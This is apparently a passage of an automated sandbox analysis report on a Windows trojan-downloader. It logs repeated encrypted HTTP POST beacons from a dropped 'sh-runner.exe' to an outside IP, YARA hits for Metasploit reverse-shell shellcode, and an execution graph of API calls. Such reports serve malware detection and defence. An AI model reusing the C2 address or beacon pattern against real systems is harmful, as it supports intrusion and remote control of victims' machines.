                                                                    2024-09-28 15:52:36 UTC243OUTData Raw: 00 00 00 ef de ad be ef 34 ad 5b d0 00 00 00 63 00 00 00 00 b6 9a 6e 04 78 18 1c 3e f2 32 bc 10 c4 74 d6 04 50 8c c0 30 06 aa 8e 42 52 ba be 50 bc 08 b0 22 d2 54 ce 22 88 8e 8c cc 98 6a 28 14 74 fe f8 d8 56 e0 29 21 6c a7 b8 b8 d3 81 21 57 ed 65 c1 90 4d 14 b5 c0 e3 0b 2d c4 49 eb 42 e1 11 e0 e6 f3 c9 6b 26 b7 f9 09 ad 33 20 55 d3 ff 07 2d ef 25 29 17 0b fc 17 85 0b 4e 04 c2 70 8b 72 8a 54 85 24 20 6e cf 66 45 30 f7 43 d2 af 09 69 f6 6d 1a 85 36 30 ee 70 42 0b 66 5d f1 ab a7 1d 15 b8 ca ee 22 f1 1c 54 2d 78 ac e9 e1 5e dc fc cd 90 40 c2 23 d5 76 3e a5 c0 eb 29 1c fe 15 39 10 19 5e 1f e8 42 01 fa 43 fc 4a af 9c 98 e1 24 be 4c 9e fd b8 ae 9a fd 89 f3 b3 a2 af 08 1d 1d a8 e3 9c 9b 26 73 39 0a 49 ad fd f4 c6 2c 8e 87 ac 9e
                                                                    Data Ascii: 4[cnx>2tP0BRP"T"j(tV)!l!WeM-IBk&3 U-%)NprT$ nfE0Cim60pBf]"T-x^@#v>)9^BCJ$L&s9I,


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    3192.168.2.44974484.201.150.2234433096C:\ProgramData\sh-runner.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-09-28 15:52:55 UTC271OUTPOST / HTTP/1.1
                                                                    Cache-Control: no-cache
                                                                    Connection: Keep-Alive
                                                                    Pragma: no-cache
                                                                    Content-Type: */*
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
                                                                    Content-Length: 243
                                                                    Host: 84.201.150.223
                                                                    2024-09-28 15:52:55 UTC243OUTData Raw: 00 00 00 ef de ad be ef 3c f2 86 5e 00 00 00 63 00 00 00 00 9c 78 0c 3e e0 d2 8e 0e 02 80 be 12 34 f2 ba 86 7c dc 8e 12 c8 06 f4 b0 78 80 fa 34 30 ec 9e b4 ea ca 98 0a 1a 42 90 98 14 12 44 00 4e 0e a2 8e df d0 64 43 c0 2f cf 5b cd 07 31 dc fe ff ae 79 50 99 ac 63 37 db d5 69 60 5e fb 89 93 f5 c1 38 a2 f9 ac b4 2a f3 57 ed f1 17 fb 8b 63 4f eb c4 b7 ee 57 64 30 d9 ff de c7 89 24 ca dc f1 14 f5 d4 20 b9 ee 13 c9 40 91 0c 9b ed 4a 8b 0f 3a 5e 22 1c b6 66 f2 1a bc 4d 9d b8 c8 57 db 71 9e 9a a3 b9 48 8f dc af 24 fc 6c a6 53 ec 7e 70 0e 9f 71 b0 98 eb 39 25 ab ff 72 5f ad 81 83 14 93 95 f9 14 00 35 c6 c2 3c 35 d6 23 c9 e0 a5 37 f0 fb 7d 07 49 cd de d9 36 f3 d5 45 25 3f a3 d0 ab 96 f7 ad 47 4c b8 68 85 f3 47 fa be 90 1c aa 9f
                                                                    Data Ascii: <^cx>4|x40BDNdC/[1yPc7i`^8*WcOWd0$ @J:^"fMWqH$lS~pq9%r_5<5#7}I6E%?GLhG


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    4192.168.2.46306584.201.150.2234432196C:\ProgramData\sh-runner.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-09-28 15:53:03 UTC271OUTPOST / HTTP/1.1
                                                                    Cache-Control: no-cache
                                                                    Connection: Keep-Alive
                                                                    Pragma: no-cache
                                                                    Content-Type: */*
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
                                                                    Content-Length: 243
                                                                    Host: 84.201.150.223
                                                                    2024-09-28 15:53:03 UTC243OUTData Raw: 00 00 00 ef de ad be ef 2c d8 bf fa 00 00 00 63 00 00 00 00 a8 1e b0 56 04 f4 40 d0 1e 46 dc f8 da 86 86 1c 44 d6 12 2a 58 2a 08 50 a6 74 42 b8 60 b6 46 62 24 a0 ba b0 c6 66 24 1e b0 a0 dc c0 06 d4 3c 06 7a 7c 55 fe c9 9f 58 96 60 e8 af 81 c8 d4 8c fb 31 de ed 8f f3 73 77 63 56 15 41 d0 f1 ee bf b8 b3 e1 1b 07 be 57 db f6 5a 47 a9 f4 40 f6 b1 b8 2d 30 74 87 b9 b0 3b cf 47 97 76 aa da 59 ba 0a 08 cf 10 8d fb c7 fb 94 fe c5 d7 ac e7 2e 73 bf 04 c4 a0 a2 5e 71 1e 8e a2 1c b2 11 36 e8 cb 30 e7 2c cf dc 2e 3e f3 d8 33 79 67 fd 72 6d c2 16 2a 1c 2b 66 4f f5 95 b9 33 03 f8 e1 6c 17 05 86 2c ea 51 24 df 97 65 38 68 82 78 2d dc fe a3 5e 82 cc ed 16 13 7d 48 37 02 fa c7 c7 58 7f a5 f8 81 86 cd 2d a3 3f cc 13 69 30 bb a6 4c a9 8a
                                                                    Data Ascii: ,cV@FD*X*PtB`Fb$f$<z|UX`1swcVAWZG@-0t;GvY.s^q60,.>3ygrm*+fO3l,Q$e8hx-^}H7X-?i0L


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    5192.168.2.46306684.201.150.2234435472C:\ProgramData\sh-runner.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-09-28 15:53:11 UTC271OUTPOST / HTTP/1.1
                                                                    Cache-Control: no-cache
                                                                    Connection: Keep-Alive
                                                                    Pragma: no-cache
                                                                    Content-Type: */*
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
                                                                    Content-Length: 243
                                                                    Host: 84.201.150.223
                                                                    2024-09-28 15:53:11 UTC243OUTData Raw: 00 00 00 ef de ad be ef 34 ad 5b d0 00 00 00 63 00 00 00 00 b6 9a 6e 04 78 18 1c 3e f2 32 bc 10 c4 74 d6 04 50 8c c0 30 06 aa 8e 42 52 ba be 50 bc 08 b0 22 d2 54 ce 22 88 8e 8c cc 98 6a 28 14 74 fe f8 d8 1d 08 de 55 0e 8d ad 40 c9 52 1b ba 57 c6 34 ee 2a c0 7a 75 95 5f 0f f4 b8 64 56 91 1c 44 27 5e a4 dc a5 6b 14 d2 af c0 5f f0 7c ef dc ca a6 ef 39 fe 3f ca 1c 29 ab 22 5f 72 a5 11 4b 5e f6 1b b0 9d 5c 50 1b ab 3e 36 73 69 25 21 be 8a 24 5d 2a 79 cd d3 29 aa 7d fc 87 3b 6e 02 1a b1 c7 55 12 c9 2a 97 34 c6 ff 70 c9 2a 0f ac 48 20 e7 7d b1 47 63 f0 c0 dd ee ab 47 74 51 ce e2 04 8a 35 c3 e7 9d 8c 29 e7 ad f2 1d 55 4c 01 0d bb 88 29 b1 fc a3 ed b3 73 d7 0c 8c 20 db d8 59 eb d3 68 1c 33 ba 54 cf 37 35 61 68 1e f1 83 c6 3d 8b
                                                                    Data Ascii: 4[cnx>2tP0BRP"T"j(tU@RW4*zu_dVD'^k_|9?)"_rK^\P>6si%!$]*y)};nU*4p*H }GcGtQ5)UL)s Yh3T75ah=


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    6192.168.2.46306784.201.150.2234433096C:\ProgramData\sh-runner.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-09-28 15:53:32 UTC271OUTPOST / HTTP/1.1
                                                                    Cache-Control: no-cache
                                                                    Connection: Keep-Alive
                                                                    Pragma: no-cache
                                                                    Content-Type: */*
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
                                                                    Content-Length: 243
                                                                    Host: 84.201.150.223
                                                                    2024-09-28 15:53:32 UTC243OUTData Raw: 00 00 00 ef de ad be ef 3c f2 86 5e 00 00 00 63 00 00 00 00 9c 78 0c 3e e0 d2 8e 0e 02 80 be 12 34 f2 ba 86 7c dc 8e 12 c8 06 f4 b0 78 80 fa 34 30 ec 9e b4 ea ca 98 0a 1a 42 90 98 14 12 44 00 4e 0e a2 8e 91 55 7b 2f 9c 23 c5 67 89 c8 23 72 1f 0e 24 ad 07 fe fd 41 17 fb 13 30 54 8d 7a b2 f6 1a 78 ad 11 d8 74 b3 d9 dd c2 ff aa c9 0a 6f b2 ad 33 c7 b9 86 3c 08 c6 a8 3e 5b 2a 44 2d 92 67 79 da ad 1b c2 61 8c ae df db cd 49 28 9c 32 8b 24 de b8 e2 ea a3 23 f2 a5 84 0b e6 09 9f c6 78 e7 48 b9 11 ff d1 7b 2f 6e 3f 5c 86 63 e7 88 3f 5b ad b8 9d 37 41 3a ec e2 66 42 df af 65 84 4b 83 ee 95 38 5b d1 b2 14 23 c5 b6 84 93 66 15 7a ce 3c db 24 67 c5 80 87 ec f4 ba 1c e5 62 62 94 7e 11 28 29 22 5b d7 7d 98 1c 64 43 20 37 62 13 da 20
                                                                    Data Ascii: <^cx>4|x40BDNU{/#g#r$A0Tzxto3<>[*D-gyaI(2$#xH{/n?\c?[7A:fBeK8[#fz<$gbb~()"[}dC 7b


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    7192.168.2.46306884.201.150.2234432196C:\ProgramData\sh-runner.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-09-28 15:53:39 UTC271OUTPOST / HTTP/1.1
                                                                    Cache-Control: no-cache
                                                                    Connection: Keep-Alive
                                                                    Pragma: no-cache
                                                                    Content-Type: */*
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
                                                                    Content-Length: 243
                                                                    Host: 84.201.150.223
                                                                    2024-09-28 15:53:39 UTC243OUTData Raw: 00 00 00 ef de ad be ef 2c d8 bf fa 00 00 00 63 00 00 00 00 a8 1e b0 56 04 f4 40 d0 1e 46 dc f8 da 86 86 1c 44 d6 12 2a 58 2a 08 50 a6 74 42 b8 60 b6 46 62 24 a0 ba b0 c6 66 24 1e b0 a0 dc c0 06 d4 3c 06 5a c0 dd 32 8b 3f 5f 42 3c a3 98 27 d3 48 54 a4 e8 09 84 63 e3 fd cf 7f 3e 86 ec 8f 74 be 75 70 72 32 21 6e 43 71 bc dc 38 46 8b c9 e1 6e 6f 1a 9d 9c 1f 99 a7 bb 6a ba 66 b2 d2 3f f4 0d ae 6c a0 d3 8d 03 f4 9b 92 6b 43 ae 6d fe f2 17 c4 db 81 a1 cf c9 3a 9a 5d 1c 46 98 26 08 98 60 7e 9e c8 9d 16 5c b7 09 37 b2 e6 71 b8 23 f1 8c 9d 8f b4 e0 43 ff 24 5b c9 5f 11 dc ec cb 10 46 51 68 5b e3 76 f3 ff 75 1e f0 b9 77 02 47 77 d2 b7 02 91 35 70 cd 72 f4 ce 60 b7 08 fc a3 e5 66 b9 de e7 5a 0b 7d 66 64 ef c3 07 2f cf f4 a4 56 76
                                                                    Data Ascii: ,cV@FD*X*PtB`Fb$f$<Z2?_B<'HTc>tupr2!nCq8Fnojf?lkCm:]F&`~\7q#C$[_FQh[vuwGw5pr`fZ}fd/Vv


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    8192.168.2.46306984.201.150.2234435472C:\ProgramData\sh-runner.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-09-28 15:53:46 UTC271OUTPOST / HTTP/1.1
                                                                    Cache-Control: no-cache
                                                                    Connection: Keep-Alive
                                                                    Pragma: no-cache
                                                                    Content-Type: */*
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
                                                                    Content-Length: 243
                                                                    Host: 84.201.150.223
                                                                    2024-09-28 15:53:46 UTC243OUTData Raw: 00 00 00 ef de ad be ef 34 ad 5b d0 00 00 00 63 00 00 00 00 b6 9a 6e 04 78 18 1c 3e f2 32 bc 10 c4 74 d6 04 50 8c c0 30 06 aa 8e 42 52 ba be 50 bc 08 b0 22 d2 54 ce 22 88 8e 8c cc 98 6a 28 14 74 fe f8 d8 56 e0 29 21 6c a7 b8 b8 d3 81 21 57 ed 65 c1 90 4d 14 b5 c0 e3 0b 2d c4 49 eb 42 e1 11 e0 e6 f3 c9 6b 26 b7 f9 09 ad 33 20 55 d3 ff 07 2d ef 25 29 17 0b fc 17 85 0b 4e 04 c2 70 8b 72 8a 54 85 24 20 6e cf 66 45 30 f7 43 d2 af 09 69 f6 6d 1a 85 36 30 ee 70 42 0b 66 5d f1 ab a7 1d 15 b8 ca ee 22 f1 1c 54 2d 78 ac e9 e1 5e dc fc cd 90 40 c2 23 d5 76 3e a5 c0 eb 29 1c fe 15 39 10 19 5e 1f e8 42 01 fa 43 fc 4a af 9c 98 e1 24 be 4c 9e fd b8 ae 9a fd 89 f3 b3 a2 af 08 1d 1d a8 e3 9c 9b 26 73 39 0a 49 ad fd f4 c6 2c 8e 87 ac 9e
                                                                    Data Ascii: 4[cnx>2tP0BRP"T"j(tV)!l!WeM-IBk&3 U-%)NprT$ nfE0Cim60pBf]"T-x^@#v>)9^BCJ$L&s9I,


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    9192.168.2.46307084.201.150.2234433096C:\ProgramData\sh-runner.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-09-28 15:54:07 UTC271OUTPOST / HTTP/1.1
                                                                    Cache-Control: no-cache
                                                                    Connection: Keep-Alive
                                                                    Pragma: no-cache
                                                                    Content-Type: */*
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
                                                                    Content-Length: 243
                                                                    Host: 84.201.150.223
                                                                    2024-09-28 15:54:07 UTC243OUTData Raw: 00 00 00 ef de ad be ef 3c f2 86 5e 00 00 00 63 00 00 00 00 9c 78 0c 3e e0 d2 8e 0e 02 80 be 12 34 f2 ba 86 7c dc 8e 12 c8 06 f4 b0 78 80 fa 34 30 ec 9e b4 ea ca 98 0a 1a 42 90 98 14 12 44 00 4e 0e a2 8e df d0 64 43 c0 2f cf 5b cd 07 31 dc fe ff ae 79 50 99 ac 63 37 db d5 69 60 5e fb 89 93 f5 c1 38 a2 f9 ac b4 2a f3 57 ed f1 17 fb 8b 63 4f eb c4 b7 ee 57 64 30 d9 ff de c7 89 24 ca dc f1 14 f5 d4 20 b9 ee 13 c9 40 91 0c 9b ed 4a 8b 0f 3a 5e 22 1c b6 66 f2 1a bc 4d 9d b8 c8 57 db 71 9e 9a a3 b9 48 8f dc af 24 fc 6c a6 53 ec 7e 70 0e 9f 71 b0 98 eb 39 25 ab ff 72 5f ad 81 83 14 93 95 f9 14 00 35 c6 c2 3c 35 d6 23 c9 e0 a5 37 f0 fb 7d 07 49 cd de d9 36 f3 d5 45 25 3f a3 d0 ab 96 f7 ad 47 4c b8 68 85 f3 47 fa be 90 1c aa 9f
                                                                    Data Ascii: <^cx>4|x40BDNdC/[1yPc7i`^8*WcOWd0$ @J:^"fMWqH$lS~pq9%r_5<5#7}I6E%?GLhG


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    10192.168.2.46307184.201.150.2234432196C:\ProgramData\sh-runner.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-09-28 15:54:15 UTC271OUTPOST / HTTP/1.1
                                                                    Cache-Control: no-cache
                                                                    Connection: Keep-Alive
                                                                    Pragma: no-cache
                                                                    Content-Type: */*
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
                                                                    Content-Length: 243
                                                                    Host: 84.201.150.223
                                                                    2024-09-28 15:54:15 UTC243OUTData Raw: 00 00 00 ef de ad be ef 2c d8 bf fa 00 00 00 63 00 00 00 00 a8 1e b0 56 04 f4 40 d0 1e 46 dc f8 da 86 86 1c 44 d6 12 2a 58 2a 08 50 a6 74 42 b8 60 b6 46 62 24 a0 ba b0 c6 66 24 1e b0 a0 dc c0 06 d4 3c 06 7a 7c 55 fe c9 9f 58 96 60 e8 af 81 c8 d4 8c fb 31 de ed 8f f3 73 77 63 56 15 41 d0 f1 ee bf b8 b3 e1 1b 07 be 57 db f6 5a 47 a9 f4 40 f6 b1 b8 2d 30 74 87 b9 b0 3b cf 47 97 76 aa da 59 ba 0a 08 cf 10 8d fb c7 fb 94 fe c5 d7 ac e7 2e 73 bf 04 c4 a0 a2 5e 71 1e 8e a2 1c b2 11 36 e8 cb 30 e7 2c cf dc 2e 3e f3 d8 33 79 67 fd 72 6d c2 16 2a 1c 2b 66 4f f5 95 b9 33 03 f8 e1 6c 17 05 86 2c ea 51 24 df 97 65 38 68 82 78 2d dc fe a3 5e 82 cc ed 16 13 7d 48 37 02 fa c7 c7 58 7f a5 f8 81 86 cd 2d a3 3f cc 13 69 30 bb a6 4c a9 8a
                                                                    Data Ascii: ,cV@FD*X*PtB`Fb$f$<z|UX`1swcVAWZG@-0t;GvY.s^q60,.>3ygrm*+fO3l,Q$e8hx-^}H7X-?i0L


                                                                    Click to jump to process

                                                                    Click to jump to process

                                                                    Click to dive into process behavior distribution

                                                                    Click to jump to process

                                                                    Target ID:0
                                                                    Start time:11:52:11
                                                                    Start date:28/09/2024
                                                                    Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe"
                                                                    Imagebase:0x7ff71c8c0000
                                                                    File size:250'094 bytes
                                                                    MD5 hash:CCF3C480F27DB238FA757D0967241817
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    Target ID:1
                                                                    Start time:11:52:11
                                                                    Start date:28/09/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff7699e0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:2
                                                                    Start time:11:52:13
                                                                    Start date:28/09/2024
                                                                    Path:C:\ProgramData\sh-runner.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\ProgramData\sh-runner.exe"
                                                                    Imagebase:0x7ff72bcd0000
                                                                    File size:1'169'665 bytes
                                                                    MD5 hash:D178CD15E8E69662A943BF0A9DA7FF60
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000002.00000002.3055198846.000001FF22F90000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_Metasploit_0f5a852d, Description: Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families., Source: 00000002.00000002.3055198846.000001FF22F90000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000002.00000002.3055198846.000001FF22F90000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                    Antivirus matches:
                                                                    • Detection: 39%, ReversingLabs
                                                                    Reputation:low
                                                                    Has exited:false

                                                                    Target ID:3
                                                                    Start time:11:52:13
                                                                    Start date:28/09/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff7699e0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:4
                                                                    Start time:11:52:24
                                                                    Start date:28/09/2024
                                                                    Path:C:\ProgramData\sh-runner.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\ProgramData\sh-runner.exe"
                                                                    Imagebase:0x7ff72bcd0000
                                                                    File size:1'169'665 bytes
                                                                    MD5 hash:D178CD15E8E69662A943BF0A9DA7FF60
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000004.00000002.3055112919.00000112CF4C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_Metasploit_0f5a852d, Description: Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families., Source: 00000004.00000002.3055112919.00000112CF4C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000004.00000002.3055112919.00000112CF4C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                    Reputation:low
                                                                    Has exited:false

                                                                    Target ID:5
                                                                    Start time:11:52:24
                                                                    Start date:28/09/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff7699e0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:9
                                                                    Start time:11:52:32
                                                                    Start date:28/09/2024
                                                                    Path:C:\ProgramData\sh-runner.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\ProgramData\sh-runner.exe"
                                                                    Imagebase:0x7ff72bcd0000
                                                                    File size:1'169'665 bytes
                                                                    MD5 hash:D178CD15E8E69662A943BF0A9DA7FF60
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000009.00000002.3055111517.00000184BE2A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_Metasploit_0f5a852d, Description: Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families., Source: 00000009.00000002.3055111517.00000184BE2A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000009.00000002.3055111517.00000184BE2A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                    Reputation:low
                                                                    Has exited:false

                                                                    Target ID:10
                                                                    Start time:11:52:32
                                                                    Start date:28/09/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff7699e0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Reset < >

                                                                      Execution Graph

                                                                      Execution Coverage:5.8%
                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                      Signature Coverage:11.9%
                                                                      Total number of Nodes:612
                                                                      Total number of Limit Nodes:10
                                                                      execution_graph 2889 7ff71c8c19b0 2890 7ff71c8c19b9 2889->2890 2891 7ff71c8c19bd 2890->2891 2894 7ff71c8c2450 2890->2894 2893 7ff71c8c19d5 2895 7ff71c8c2510 2894->2895 2896 7ff71c8c245e 2894->2896 2895->2893 2897 7ff71c8c2464 2896->2897 2899 7ff71c8c2472 2896->2899 2900 7ff71c8c24b0 2896->2900 2898 7ff71c8c2530 InitializeCriticalSection 2897->2898 2897->2899 2898->2899 2899->2893 2900->2899 2901 7ff71c8c24e9 DeleteCriticalSection 2900->2901 2902 7ff71c8c24d8 free 2900->2902 2901->2899 2902->2901 2902->2902 2913 7ff71c8c4833 2914 7ff71c8c4838 2913->2914 2916 7ff71c8c2f00 2914->2916 2920 7ff71c8c2f24 2916->2920 2921 7ff71c8c2fda 2916->2921 2917 7ff71c8c2fc1 memset 2917->2921 2918 7ff71c8c30cb 2922 7ff71c8c33cb memset 2918->2922 2924 7ff71c8c3340 2918->2924 2929 7ff71c8c30f5 2918->2929 2930 7ff71c8c312e 2918->2930 2919 7ff71c8c32c9 2923 7ff71c8c32e4 memset 2919->2923 2919->2929 2920->2917 2920->2921 2921->2918 2921->2919 2925 7ff71c8c2ff6 2921->2925 2922->2930 2923->2930 2924->2922 2924->2930 2926 7ff71c8c3172 fputc 2925->2926 2928 7ff71c8c3185 2925->2928 2925->2930 2926->2925 2926->2928 2927 7ff71c8c2ad0 fputc 2927->2929 2928->2930 2931 7ff71c8c31c5 fputc 2928->2931 2929->2925 2929->2927 2930->2914 2931->2928 2931->2930 2932 7ff71c8c4aaa 2933 7ff71c8c4a70 2932->2933 2934 7ff71c8c4c37 2932->2934 2933->2932 2938 7ff71c8c3de0 2933->2938 2936 7ff71c8c3de0 28 API calls 2934->2936 2937 7ff71c8c4c53 2936->2937 2939 7ff71c8c3df4 2938->2939 2948 7ff71c8c29e0 2939->2948 2942 7ff71c8c3e60 2958 7ff71c8c2e60 2942->2958 2943 7ff71c8c3e2b 2952 7ff71c8c3d10 2943->2952 2947 7ff71c8c3e6f 2947->2933 2949 7ff71c8c2a04 2948->2949 2962 7ff71c8c52e0 2949->2962 2951 7ff71c8c2a6d 2951->2942 2951->2943 2953 7ff71c8c3d3e 2952->2953 3046 7ff71c8c3930 2953->3046 2955 7ff71c8c3da3 2956 7ff71c8c2ad0 fputc 2955->2956 2957 7ff71c8c3dc4 2956->2957 2959 7ff71c8c2e74 2958->2959 3106 7ff71c8c2cc0 2959->3106 2963 7ff71c8c5578 2962->2963 2967 7ff71c8c5349 2962->2967 2965 7ff71c8c55e2 2963->2965 3001 7ff71c8c6dd0 2963->3001 2964 7ff71c8c55c0 3007 7ff71c8c50b0 2964->3007 2965->2951 2967->2963 2967->2964 2967->2967 2994 7ff71c8c6ce0 2967->2994 2970 7ff71c8c537f 2970->2963 2981 7ff71c8c543c 2970->2981 2971 7ff71c8c5070 6 API calls 2971->2981 2972 7ff71c8c5d05 2972->2951 2973 7ff71c8c6dd0 5 API calls 2975 7ff71c8c5c98 2973->2975 2974 7ff71c8c5919 2976 7ff71c8c6dd0 5 API calls 2974->2976 2975->2974 2977 7ff71c8c6dd0 5 API calls 2975->2977 2976->2965 2977->2974 2978 7ff71c8c6f00 6 API calls 2993 7ff71c8c58f3 2978->2993 2979 7ff71c8c7120 11 API calls 2979->2993 2980 7ff71c8c59cd 2980->2972 2980->2974 2983 7ff71c8c59f3 2980->2983 3011 7ff71c8c6e40 2980->3011 2981->2971 2981->2972 2981->2974 2981->2980 2981->2983 2981->2993 2983->2972 2983->2973 2985 7ff71c8c72a0 8 API calls 2985->2993 2986 7ff71c8c670a 2987 7ff71c8c6ce0 6 API calls 2986->2987 2988 7ff71c8c6717 memcpy 2987->2988 3031 7ff71c8c72a0 2988->3031 2990 7ff71c8c6e40 8 API calls 2990->2993 2992 7ff71c8c6dd0 Sleep InitializeCriticalSection InitializeCriticalSection EnterCriticalSection LeaveCriticalSection 2992->2993 2993->2972 2993->2974 2993->2978 2993->2979 2993->2980 2993->2985 2993->2986 2993->2990 2993->2992 3018 7ff71c8c7400 2993->3018 3025 7ff71c8c6fc0 2993->3025 3039 7ff71c8c6bb0 2994->3039 2997 7ff71c8c6d4c malloc 2999 7ff71c8c6d69 2997->2999 3000 7ff71c8c6d07 2997->3000 2998 7ff71c8c6d17 LeaveCriticalSection 2998->2999 2999->2970 3000->2998 3000->2999 3002 7ff71c8c6e16 3001->3002 3003 7ff71c8c6ddd 3001->3003 3002->2964 3004 7ff71c8c6bb0 4 API calls 3003->3004 3005 7ff71c8c6df7 3004->3005 3005->3002 3006 7ff71c8c6e20 LeaveCriticalSection 3005->3006 3008 7ff71c8c50c3 3007->3008 3009 7ff71c8c6ce0 6 API calls 3008->3009 3010 7ff71c8c50e4 3009->3010 3010->2965 3012 7ff71c8c6e60 3011->3012 3013 7ff71c8c6e8b 3012->3013 3014 7ff71c8c6ce0 6 API calls 3012->3014 3013->2983 3015 7ff71c8c6ebb 3014->3015 3015->3013 3016 7ff71c8c6ec3 memcpy 3015->3016 3017 7ff71c8c6dd0 5 API calls 3016->3017 